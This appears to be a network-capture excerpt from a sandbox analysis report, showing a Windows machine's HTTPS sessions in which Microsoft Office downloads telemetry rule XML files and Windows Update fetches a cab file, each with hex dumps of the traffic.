                                                                                                                                                                                          2024-11-23 16:44:59 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          89192.168.2.54983013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:58 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:59 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 174
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                          ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                          x-ms-request-id: 5556881b-d01e-008e-6531-3c387a000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164459Z-178bfbc474bwh9gmhC1NYCy3rs00000004pg00000000qgwh
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:59 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          90192.168.2.54984413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:01 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1952
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                          ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                          x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164502Z-178bfbc474bnwsh4hC1NYC2ubs00000004r000000000g6xy
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:02 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          91192.168.2.54984613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:01 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 958
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                          x-ms-request-id: 4857c71c-401e-0067-7e3a-3c09c2000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164502Z-15b8b599d88tr2flhC1TEB5gk400000003c0000000005rgn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:02 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          92192.168.2.54984513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:01 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 2592
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                          x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164502Z-178bfbc474bwh9gmhC1NYCy3rs00000004ug000000007we0
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:02 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          93192.168.2.54984813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:01 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 3342
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                          ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                          x-ms-request-id: dc5ae1d1-201e-0096-3d45-3dace6000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164502Z-178bfbc474bv587zhC1NYCny5w00000004qg00000000147m
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:02 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          94192.168.2.54984713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:01 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 501
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                          ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                          x-ms-request-id: b5a95b30-c01e-002b-0632-3c6e00000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164502Z-178bfbc474bpnd5vhC1NYC4vr400000004n000000000k44x
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:02 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          95192.168.2.54985452.149.20.212443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:03 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGAb88btcw5v4GD&MD=uxdHDVbu HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                          2024-11-23 16:45:03 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                          MS-CorrelationId: 373ed0e6-6502-43a2-a1bb-79d0fd6983ed
                                                                                                                                                                                          MS-RequestId: d65323f1-cb7e-4026-8fbe-445ec3afb961
                                                                                                                                                                                          MS-CV: 14NUyv3V+k64GKPL.0
                                                                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:02 GMT
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 30005
                                                                                                                                                                                          2024-11-23 16:45:03 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                          2024-11-23 16:45:03 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          96192.168.2.54986013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:04 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:04 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 2284
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                          ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                          x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164504Z-178bfbc474bh5zbqhC1NYCkdug00000004q00000000074a5
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:04 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          97192.168.2.54986213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:04 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:04 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1356
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                          x-ms-request-id: e3da2723-301e-0051-6021-3d38bb000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164504Z-178bfbc474bxkclvhC1NYC69g400000004p000000000ba64
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
